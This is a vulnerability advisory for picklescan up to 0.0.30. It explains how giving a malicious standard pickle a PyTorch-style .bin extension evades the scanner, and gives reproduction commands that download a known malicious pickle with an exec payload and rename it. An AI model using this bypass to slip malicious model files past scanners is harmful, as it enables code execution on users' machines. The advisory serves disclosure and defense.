An Improper Input Validation vulnerability in the scanning logic of mmaitre314 picklescan versions up to and including 0.0.30 allows a remote attacker to bypass pickle files security checks by supplying a standard pickle file with a PyTorch-related file extension. When the pickle file incorrectly considered safe is loaded, it can lead to the execution of malicious code.
( , 0.0.31)
The vulnerability exists in the scan_bytes function, which prioritizes file extension checks. If a file has a PyTorch-related extension (e.g., .bin), the scanner attempts to parse it using the scan_pytorch function. When a standard pickle file is given such an extension, this PyTorch-specific parsing fails. Crucially, the scanner then returns an error without falling back to a standard pickle analysis (scan_pickle_bytes). This logic gap allows a malicious standard pickle file, disguised with a mismatched extension, to evade detection.
The following steps demonstrate how to bypass the scanner.
# 1. Download a known malicious pickle file.
wget https://huggingface.co/kzanki/regular_model/resolve/main/model.pkl?download=true -O model.pkl
# 2. Scan the original file. PickleScan correctly detects the threat.
# Output will contain: dangerous import 'builtins exec' FOUND
picklescan -p model.pkl
# 3. Rename the file with a PyTorch-related extension.
cp model.pkl model.bin
# 4. Scan the renamed file.
# The scan will fail with a PyTorch parsing error and NOT detect the malicious payload.
picklescan -p model.bin
No mitigations are supplied for this issue